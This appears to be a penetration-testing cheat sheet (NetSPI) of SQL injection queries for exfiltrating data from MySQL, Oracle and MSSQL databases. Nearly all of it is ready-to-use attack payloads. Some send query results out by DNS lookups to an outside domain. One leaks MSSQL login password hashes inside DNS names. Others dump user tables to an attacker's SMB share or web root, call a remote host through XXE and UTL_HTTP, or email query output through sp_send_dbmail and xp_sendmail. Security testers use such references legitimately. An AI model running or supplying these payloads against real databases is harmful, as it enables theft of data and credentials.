Data Exfiltration

Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.

* Requires privileged user

Description Query
DNS Request SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), '.yourhost.com\\'))
SMB Share SELECT * FROM USERS INTO OUTFILE '\\attacker\SMBshare\output.txt'
HTTP Server SELECT * FROM USERS INTO OUTFILE '/var/www/html/output.txt'
Numeric Concatenation SELECT length(user())
SELECT ASCII(substr(user(),1))

When data can only be exported as numbers, convert to ASCII. For automation see here.

Data Exfiltration

Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.

* Requires privileged user

Description Query
Combine multiple lines into one SELECT dbms_xmlgen.getxmltype('select user from dual') FROM dual
XML External Entity SELECT xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>') FROM dual;
URL_HTTP Request (Pre-11gR2) SELECT UTL_HTTP.request ('http://IP/test') FROM dual;
Escaping special characters SELECT UTL_URL.escape('http://IP/' || USER) FROM dual;

Data Exfiltration

Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.

Note: It is possible to make a DNS request from MSSQL. However, this request requires administrator privileges and SQL Server 2005.

Description Query
Make DNS Request DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"');
UNC Path (DNS Request) xp_dirtree '\\data.domain.com\file'
The UNC Path Injection Cheatsheet can be found here.
Enable sp_send_dbmail and send query sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='harold@netspi.com',@query='select @@version';
Basic xp_sendmail Query EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.'
Send Full Email with xp_sendmail EXEC xp_sendmail @recipients='harold@netspi.com',
@message='This is a test.',
@copy_recipients='test@netspi.com',
@subject='TEST'
Send Query Results Via xp_sendmail EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version';
Send Query Results as Attachment Via xp_sendmail CREATE TABLE ##texttab (c1 text)
INSERT ##texttab values ('Put messge here.')
DECLARE @cmd varchar(56)
SET @cmd = 'SELECT c1 from ##texttab'
EXEC master.dbo.xp_sendmail 'robertk',
@query = @cmd, @no_header='TRUE'
DROP TABLE ##texttab

© 2023 Copyright by NetSPI. All rights reserved.